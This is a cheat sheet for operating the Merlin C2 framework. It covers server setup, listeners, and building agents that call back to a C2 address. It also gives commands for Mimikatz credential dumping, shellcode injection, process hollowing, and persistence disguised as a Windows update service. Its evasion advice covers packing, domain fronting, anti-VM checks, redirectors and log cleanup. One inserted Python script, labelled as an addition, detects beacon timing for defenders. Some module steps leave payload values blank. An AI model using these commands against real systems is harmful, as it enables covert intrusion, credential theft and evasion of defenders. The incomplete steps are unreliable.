
Merlin C2 Framework Cheat Sheet

Overview

Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang. It uses HTTP/2 for communication and offers modern protocol evasion features with built-in data jitter and encryption.

Warning: This tool is intended only for authorized penetration testing and red team exercises. Make sure you have proper authorization before using it in any environment.

Installation

Precompiled Binaries

```bash
# Download latest release for Linux
wget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Linux-x64.7z
7z x merlinServer-Linux-x64.7z

# Download latest release for Windows
# Download merlinServer-Windows-x64.7z from GitHub releases

# Download latest release for macOS
wget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Darwin-x64.7z
7z x merlinServer-Darwin-x64.7z
```

Building from Source

```bash
# Install Go (version 1.19+)
git clone https://github.com/Ne0nd0g/merlin.git
cd merlin
make build-server
make build-agent
```

Docker Installation

```bash
# Pull official Docker image
docker pull ne0nd0g/merlin

# Run Merlin server in Docker
docker run -it -p 443:443 ne0nd0g/merlin
```

Basic Usage

Starting the Merlin Server

```bash
# Start server with default settings
./merlinServer-Linux-x64

# Start server with custom interface
./merlinServer-Linux-x64 -i 0.0.0.0

# Start server with custom port
./merlinServer-Linux-x64 -p 8443

# Start server with custom certificate
./merlinServer-Linux-x64 -crt /path/to/cert.crt -key /path/to/key.key
```

Agent Generation

```bash
# Generate Windows agent
make build-agent-windows

# Generate Linux agent
make build-agent-linux

# Generate macOS agent
make build-agent-darwin
```

Command Reference

Server Management

| Command | Description |
| --- | --- |
| `help` | Display help menu |
| `version` | Show version information |
| `listeners` | List active listeners |
| `agents` | List connected agents |
| `sessions` | Show active sessions |
| `exit` | Exit Merlin server |

Listener Management

| Command | Description |
| --- | --- |
| `listeners` | List all listeners |
| `use listener <type>` | Select listener type |
| `set <option> <value>` | Set listener option |
| `start` | Start the listener |
| `stop` | Stop the listener |
| `info` | Show listener information |

Agent Interaction

| Command | Description |
| --- | --- |
| `interact <agent-id>` | Interact with agent |
| `shell <command>` | Execute shell command |
| `upload <local> <remote>` | Upload file to agent |
| `download <remote> <local>` | Download file from agent |
| `kill` | Kill the agent |
| `back` | Return to main menu |

Listener Configuration

HTTP/2 Listener

```bash
# Use HTTP/2 listener
use listener http2

# Configure listener options
set Interface 0.0.0.0
set Port 443
set Certificate /path/to/cert.crt
set Key /path/to/key.key

# Start listener
start
```

HTTP/3 Listener (QUIC)

```bash
# Use HTTP/3 listener
use listener http3

# Configure QUIC options
set Interface 0.0.0.0
set Port 443
set Certificate /path/to/cert.crt
set Key /path/to/key.key

# Start listener
start
```

TCP Listener

```bash
# Use TCP listener
use listener tcp

# Configure TCP options
set Interface 0.0.0.0
set Port 4444

# Start listener
start
```

SMB Listener

```bash
# Use SMB listener (Windows)
use listener smb

# Configure SMB options
set Interface 0.0.0.0
set Port 445

# Start listener
start
```

Agent Configuration

HTTP/2 Agent

```bash
# Build HTTP/2 agent
GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://192.168.1.100:443" -o agent.exe cmd/merlinagent/main.go

# Build with custom options
GOOS=linux GOARCH=amd64 go build -ldflags "-X main.url=https://192.168.1.100:443 -X main.sleep=30s -X main.jitter=0.2" -o agent cmd/merlinagent/main.go
```

Agent Options

```bash
# Set communication URL
-X main.url=https://server.com:443

# Set sleep interval
-X main.sleep=30s

# Set jitter percentage
-X main.jitter=0.2

# Set maximum retries
-X main.maxretry=7

# Set user agent
-X main.useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64)"

# Set proxy
-X main.proxy=http://proxy.com:8080
```
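
From the defender's side, a fixed sleep interval with bounded jitter still leaves a regular timing signature in connection logs. The following added example (not from the original cheat sheet or the Merlin project) flags source/destination pairs whose inter-connection gaps have a low coefficient of variation; the record layout, thresholds and sample data are constructed, and jitter is assumed to be a uniform fraction of the sleep interval.

```python
from collections import defaultdict
from statistics import mean, pstdev


def timeline(start, gaps):
    """Turn a start time and a list of gaps (seconds) into timestamps."""
    times = [start]
    for gap in gaps:
        times.append(times[-1] + gap)
    return times


def beacon_candidates(records, min_events=6, max_cv=0.25):
    """Return {(src, dst): (mean_gap, cv)} for pairs with regular check-ins.

    Uniform jitter of fraction j around a sleep interval gives a coefficient
    of variation (stdev / mean) of about j / sqrt(3), e.g. 0.12 for j = 0.2;
    irregular, human-driven traffic typically scores much higher.
    """
    by_pair = defaultdict(list)
    for ts, src, dst in records:
        by_pair[(src, dst)].append(ts)
    hits = {}
    for pair, times in by_pair.items():
        if len(times) < min_events:
            continue  # too few connections to judge periodicity
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue  # all connections share one timestamp
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            hits[pair] = (round(avg, 1), round(cv, 3))
    return hits


# Constructed sample: one host checking in every ~30 s with +/-20% jitter,
# one host with irregular, human-driven connections.
BEACON_GAPS = [34.5, 27, 36, 24.6, 31.5, 29.4, 33, 24]
BROWSING_GAPS = [2, 140, 5, 900, 33, 1, 410]
SAMPLE = (
    [(t, "10.0.0.5", "203.0.113.10:443") for t in timeline(1700000000, BEACON_GAPS)]
    + [(t, "10.0.0.8", "198.51.100.7:443") for t in timeline(1700000000, BROWSING_GAPS)]
)

if __name__ == "__main__":
    for pair, (avg, cv) in beacon_candidates(SAMPLE).items():
        print(pair, f"mean gap {avg}s, cv {cv}")
```

Raising `max_cv` widens the net to higher jitter settings at the cost of more false positives from scheduled but legitimate traffic such as update checks.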

Post-Exploitation Commands

System Information

```bash
# Get system information
sysinfo

# Get current user
whoami

# Get environment variables
env

# Get network interfaces
ifconfig

# Get running processes
ps
```

File Operations

```bash
# List directory contents
ls /path/to/directory

# Change directory
cd /path/to/directory

# Create directory
mkdir /path/to/new/directory

# Remove file
rm /path/to/file

# Copy file
cp /source/file /destination/file

# Move file
mv /source/file /destination/file
```

Network Operations

```bash
# Network connections
netstat

# ARP table
arp

# Routing table
route

# DNS lookup
nslookup domain.com

# Ping host
ping 192.168.1.1
```

Process Management

```bash
# List processes
ps

# Kill process
kill

# Start process
execute

# Get process information
info
```

Advanced Features

Module System

```bash
# List available modules
modules

# Use module
use module

# Set module options
set

# Run module
run

# Show module info
info
```

Built-in Modules

```bash
# Mimikatz module
use module mimikatz
set Command sekurlsa::logonpasswords
run

# PowerShell module
use module powershell
set Command Get-Process
run

# Assembly execution
use module executeassembly
set Assembly /path/to/assembly.exe
set Arguments "arg1 arg2"
run
```

Shellcode Execution

```bash
# Execute shellcode
use module shellcode
set Shellcode
run

# Shellcode injection
use module shinject
set PID
set Shellcode
run
```

Persistence

```bash
# Registry persistence
use module persistence
set Method registry
set Key "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
set Value "Update"
set Data "C:\temp\agent.exe"
run

# Service persistence
use module service
set Name "UpdateService"
set DisplayName "Windows Update Service"
set BinaryPath "C:\temp\agent.exe"
run
```

Evasion Techniques

Traffic Obfuscation

```bash
# Custom User-Agent
-X main.useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Custom headers
-X main.headers="X-Custom-Header:value"

# Domain fronting
-X main.url=https://cdn.example.com -X main.host=legitimate-site.com
```

Payload Obfuscation

```bash
# Build with custom build tags
go build -tags="debug" -ldflags "-s -w" -o agent.exe

# Use UPX packing
upx --best agent.exe

# Custom encryption
-X main.psk=your-pre-shared-key
```

Anti-Analysis

```bash
# VM detection
use module vmdetect
run

# Sandbox evasion
use module sleep
set Duration 60
run

# Process hollowing
use module hollow
set Target notepad.exe
set Payload
run
```

Certificate Management

Generating Self-Signed Certificates

```bash
# Generate certificate and key
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes

# Generate with SAN
# -subj sets the subject without prompting; -extensions SAN applies the [SAN] section
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes \
  -subj "/CN=server.com" -extensions SAN \
  -config <(
    echo '[req]'
    echo 'distinguished_name = req'
    echo '[SAN]'
    echo 'subjectAltName = DNS:server.com,DNS:*.server.com,IP:192.168.1.100'
  )
```

Let's Encrypt Certificate

```bash
# Install certbot
sudo apt install certbot

# Generate certificate
certbot certonly --standalone -d yourdomain.com

# Use certificate with Merlin
./merlinServer-Linux-x64 -crt /etc/letsencrypt/live/yourdomain.com/fullchain.pem -key /etc/letsencrypt/live/yourdomain.com/privkey.pem
```

Operational Procedures

Infrastructure Setup

```bash
# Use redirectors
# Set up nginx reverse proxy
server {
    listen 443 ssl http2;
    server_name legitimate-site.com;

    ssl_certificate /path/to/cert.crt;
    ssl_certificate_key /path/to/key.key;

    location / {
        proxy_pass https://merlin-server:443;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
    }
}
```

Team Operations

```bash
# Multi-operator setup
# Use shared database or file system
# Implement proper access controls
# Use separate operator certificates
```

Logging and Monitoring

```bash
# Enable detailed logging
./merlinServer-Linux-x64 -debug

# Monitor connections
tail -f merlin.log

# Network monitoring
tcpdump -i any -w merlin_traffic.pcap port 443
```

Troubleshooting

Connection Issues

```bash
# Check listener status
listeners

# Test connectivity
curl -k https://server.com:443

# Check certificate
openssl s_client -connect server.com:443 -servername server.com
```

Agent Issues

```bash
# Debug agent connection
# Build agent with debug flags
go build -ldflags "-X main.debug=true" -o agent-debug.exe

# Check agent logs
# Enable verbose output in agent
```

Performance Issues

```bash
# Adjust sleep and jitter
-X main.sleep=10s -X main.jitter=0.1

# Optimize HTTP/2 settings
# Increase connection limits
# Use connection pooling
```

Certificate Issues

```bash
# Verify certificate
openssl x509 -in server.crt -text -noout

# Check certificate chain
openssl verify -CAfile ca.crt server.crt

# Test SSL configuration
sslscan server.com:443
```

Detection Evasion

Network Level

  • Use legitimate certificates and domains
  • Implement proper HTTP/2 configuration
  • Vary communication patterns and timing
  • Use domain fronting techniques
  • Implement proper error handling

Host Level

  • Use legitimate process names and paths
  • Implement anti-VM and sandbox detection
  • Use process hollowing and injection
  • Encrypt payloads and communications
  • Clean up artifacts and logs

Behavioral

  • Limit resource usage and network activity
  • Use legitimate user agents and headers
  • Implement proper sleep and jitter
  • Avoid suspicious API calls
  • Use living-off-the-land techniques

Resources

--

*This cheat sheet provides a comprehensive reference for using the Merlin C2 Framework. Always make sure you have proper authorization before using this tool in any environment.*